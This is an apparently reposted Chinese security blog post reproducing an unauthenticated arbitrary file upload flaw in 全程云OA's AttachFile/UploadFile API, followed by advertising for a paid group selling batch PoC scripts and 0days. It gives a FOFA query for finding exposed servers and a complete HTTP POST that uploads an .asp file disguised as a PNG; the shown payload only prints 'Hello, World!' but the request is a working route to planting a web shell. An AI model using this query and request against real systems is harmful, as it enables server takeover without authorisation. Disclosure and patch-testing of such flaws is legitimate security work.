首页 > 其他分享 >「漏洞复现」全程云OA AttachFile/UploadFile 任意文件上传漏洞

「漏洞复现」全程云OA AttachFile/UploadFile 任意文件上传漏洞

时间:2024-09-08 08:57:06浏览次数:12  
标签:UploadFile WebKitFormBoundary7yyQ5XLHOn6WZ6MT image AttachFile OA 漏洞 星球 安全

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能,超过100多个子模块。为企业内部提供高效、畅通的信息渠道,同时也能大力推动公司信息系统发展,提高企业的办公自动化程度和综合管理水平,加快企业信息的流通,提高企业市场竞争能力。

0x03 漏洞威胁

全程云OA AttachFile/UploadFile 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x04 漏洞环境

FOFA:

body="images/yipeoplehover.png"

0x05 漏洞复现

PoC

POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7yyQ5XLHOn6WZ6MT
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary7yyQ5XLHOn6WZ6MT
Content-Disposition: form-data; name="upload"; filename="1.asp"
Content-Type: image/png
<% Response.Write("Hello, World!") %>
------WebKitFormBoundary7yyQ5XLHOn6WZ6MT--

 

验证

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

标签:UploadFile,WebKitFormBoundary7yyQ5XLHOn6WZ6MT,image,AttachFile,OA,漏洞,星球,安全
From: https://blog.csdn.net/qq_39894062/article/details/142006428

相关文章

  • Java反序列化漏洞-TemplatesImpl利用链分析
    目录一、前言二、正文1.寻找利用链2.构造POC2.1生成字节码2.2加载字节码1)getTransletInstance2)defineTransletClasses2.3创建实例3.完整POC三、参考文章一、前言java.lang.ClassLoader#defineClassdefineClass可以加载字节码,但由于defineClass的作用域是protected,所以攻......
  • 众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现
    1产品简介众诚网上订单系统通过集成互联网技术和先进的管理思想,为生产制造企业、多分销渠道的批零兼营、各类商贸批发业务提供了一站式的订单管理解决方案。该系统支持电脑PC、平板、手机APP同步操作,实现了订单、商品、客户、资金、信息、支付、物流和电子商务的全方位连接,......
  • 04-burp对http网站抓包&漏洞利用及信息收集
    1、安装burp并实现抓取HTTP站点的数据包(HTTPS站点暂时不要求)首先用docker开启dvwa容器,创建出一个http的站点(dvwa)dockerrun-d-p8080:80sagikazarmark/dvwa然后在网络设置中,将配置访问互联网的代理服务器中的选项改为手动配置代理(以Firefox为例),其中HTTP代理的IP地址和......
  • 【第96课】云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
    免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉......
  • 短视频程序源码,文件上传漏洞及防御方法
    短视频程序源码,文件上传漏洞及防御方法一、文件上传漏洞原理在短视频程序源码的文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。二、文件上传漏洞触发点相......
  • 用友U8 Cloud MultiRepChooseAction SQL注入漏洞复现
    0x01产品简介用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。0x02漏洞概述用友U8CloudMultiRepChooseAction 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后......
  • 用友U8 Cloud AddTaskDataRightAction SQL注入漏洞复现
    0x01产品简介用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。0x02漏洞概述用友U8 CloudAddTaskDataRightAction 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员......
  • Nacos 认证绕过漏洞(CVE-2021-29441)
    相关介绍Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。小知识:Nacos初始用户......
  • 首发 最新AWVS/Acunetix Premium V24.8高级版漏洞扫描器(最新版)Windows/Linux下载
    前言AcunetixPremium是一种Web应用程序安全解决方案,用于管理多个网站、Web应用程序和API的安全。集成功能允许您自动化DevOps和问题管理基础架构。AcunetixPremium:全面的Web应用程序安全解决方案Web应用程序对于企业和组织与客户、合作伙伴和员工的联系至关重要。......
  • 【漏洞分析】Penpie 攻击事件:重入攻击构造奖励金额
    背景信息2024年9月3日,Penpie合约遭受重入攻击,攻击者在重入阶段向合约添加流动性来冒充奖励金额,从而获取合约内原有的奖励代币。资产损失高达2734万美元。2024年5月,Penpie平台新增了推出了无需许可的资产池功能,即允许Pendle上的用户可以在该平台上自建任何PT或YT......